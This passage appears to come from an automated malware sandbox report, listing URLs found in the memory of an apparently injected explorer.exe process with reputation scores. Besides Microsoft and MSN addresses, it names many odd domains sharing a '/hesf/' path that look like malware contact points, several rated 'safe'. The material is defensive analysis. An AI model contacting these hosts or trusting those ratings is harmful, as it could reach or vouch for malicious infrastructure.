                                        http://www.pendletonofficial.shop/hesf/www.shayun.netexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.homespy.net/hesf/explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.jf66899j.com/hesf/www.jimenezfarmersinsurance.shopexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.othersidewear.com/hesf/www.91fulizifen.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jimenezfarmersinsurance.shop/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.microsoft.cexplorer.exe, 0000000F.00000003.2284163967.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3856158250.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.im-newbie-journal.online/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://android.notify.windows.com/iOSdexplorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.svgco.lifeReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.1320detailingsupplies.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.brownkrosshui.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.jimenezfarmersinsurance.shopReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.1320detailingsupplies.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.pendletonofficial.shop/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://outlook.comexplorer.exe, 0000000F.00000002.3864604244.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.othersidewear.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.87b52.clubexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.tygyro.com/hesf/www.87b52.clubexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.87b52.clubReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.pendletonofficial.shopexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://android.notify.windows.com/iOSexplorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000F.00000003.2285903553.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3078591847.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BCBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1596839591.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.pancakesandwaflesbeverages.netReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.schistdisc.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.87b52.club/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.homespy.netReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandinexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.jf66899j.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.1320detailingsupplies.comReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.brownkrosshui.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.schistdisc.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000F.00000002.3856158250.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1592153566.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2284163967.00000000090DA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.jf66899j.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.schistdisc.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.jf66899j.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.im-newbie-journal.onlineReferer:explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.microexplorer.exe, 0000000F.00000002.3853009126.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.1585353154.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.3853115679.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.brownkrosshui.com/hesf/explorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000F.00000003.2285656371.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.1588663028.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077679247.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3851068029.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://wns.windows.com/EM0explorer.exe, 0000000F.00000000.1596839591.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077912790.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2286640369.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3864604244.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.91fulizifen.comexplorer.exe, 0000000F.00000003.2285592376.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3891793331.0000000011121000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3077050446.000000001111A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2285425330.0000000011119000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.3076243604.0000000011119000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
